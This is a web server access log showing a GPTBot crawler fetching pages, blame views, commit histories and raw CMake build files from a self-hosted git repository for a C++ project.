"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16402] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10176] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11518] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14307] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10422] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" -[17/Feb/2026:15:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10419] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" -[17/Feb/2026:15:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" [Client 74.7.227.38] [Length 10923] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" [Client 74.7.227.38] [Length 10927] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" -[17/Feb/2026:15:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" [Client 74.7.227.38] [Length 10930] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" -[17/Feb/2026:15:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" [Client 74.7.227.38] [Length 10725] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12891] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14854] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:15 